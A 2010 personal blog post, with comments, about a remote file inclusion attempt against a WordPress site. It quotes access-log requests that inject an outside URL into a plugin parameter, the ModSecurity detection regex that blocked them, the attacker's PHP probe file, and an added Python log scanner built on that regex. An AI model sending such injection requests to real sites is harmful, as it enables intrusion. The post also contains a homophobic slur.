Blog was hacked
My blog was hacked by some fag from somewhere due to an exploit in the Wordpress plugin HashCash.
The server load surged to 300 and I had to disable Wordpress temporarily and re-install 2.9.1.
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives/242//components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives//components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEzEq5kAAAAK"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/archives/242//components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEpmXZcAAAAJ"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "blog.est.im"] [uri "/archives//components/com_hashcash/server.php"] [unique_id "S0MqF0Wji1IAAEmWRFIAAAAI"]
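As an added example, not code from the original post: a small Python scanner that applies the regex from the ModSecurity rule quoted above (id 390144, "Generic Attempt to remote include command shell") to Apache access-log lines, so the same remote-include attempts can be found after the fact in a raw access log, including on hosts without mod_security. The log lines embedded in it are constructed samples modelled on the ones above (the 10.0.0.x entries are made up), the case-insensitive matching is my assumption rather than something the rule file states, and the helper names (is_rfi_attempt, scan_log, count_by_ip) are my own.

```python
import re
from collections import Counter

# Regex from ModSecurity rule id 390144 (gotroot 50_asl_rootkits.conf) as quoted in
# the error log above. The log shows each backslash doubled (escaping); the live
# pattern uses single backslashes. It fires when a query-string value is a URL that
# ends in a file extension followed by an optional space and a literal "?", the
# shape a remote file inclusion takes so the included script sees a query string.
# re.IGNORECASE is an assumption added here; the rule file's transforms are not
# shown on the page.
RFI_PATTERN = re.compile(
    r"=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt"
    r"|js|html?|tmp|asp)\x20?\?",
    re.IGNORECASE,
)

# Apache combined log format: ip ident user [time] "request" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: the first line mirrors the post's real request, the
# 10.0.0.x lines are invented (one benign page view, one RFI probe against a
# different parameter, one benign redirect whose URL has no trailing "?").
SAMPLE_LOG = """\
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Jan/2010:04:02:00 -0800] "GET /archives/242 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.6 - - [05/Jan/2010:04:03:10 -0800] "GET /index.php?page=http://example.invalid/shell.txt? HTTP/1.1" 200 512 "-" "curl/7.19"
10.0.0.7 - - [05/Jan/2010:04:04:45 -0800] "GET /redirect?url=http://example.invalid/page.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def is_rfi_attempt(uri):
    """True if the request URI has the remote-include shape the rule looks for."""
    return RFI_PATTERN.search(uri) is not None


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Return one record per log line whose URI matches the rule's pattern."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_rfi_attempt(rec["uri"]):
            continue
        m = RFI_PATTERN.search(rec["uri"])
        hits.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "uri": rec["uri"],
            "status": rec["status"],   # 503 here means the WAF already blocked it;
            "scheme": m.group(1),      # a 200 would be the one to investigate
            "ext": m.group(3),
        })
    return hits


def count_by_ip(hits):
    """Attempts per source address, useful for deciding what to block."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} status={h["status"]} ext={h["ext"]} {h["uri"]}')
    print(dict(count_by_ip(found)))
```

Run it against a real log with scan_log(open("access.log").read()); a hit with status 200 is a request that reached the application, which is the case that warrants checking the included URL and the server's outbound connections.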
http://photoworld.com.ua////zfxid1.txt
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
When upgrading to Wordpress 2.9.1 I lost some of my modifications to Wordpress, and I had to type them in again letter by letter in a slow SSH terminal. Fuck!
Haha
Why has your blog on yo2.cn been deleted? It has caused many links to fail.
BTW, this blog isn't blocked by the wall. Why do you have to type in a slow SSH terminal?
@dfs
Ask yo2.cn why.
Fuck yo2.cn & its administrator.
Edit it at localhost, then scp it to the remote host.
Hi! If you install everything in the same way, that means your site is still vulnerable. You need to uninstall the software with the "Remote Code Injection" bug. This is an extremely dangerous bug. An attacker may delete everything you have. You can find detailed information about this type of attack in the article "Anatomy and dissecting of Remote Code Injection Attacks". You may also check suspicious IP numbers on that site.
A bit tragic!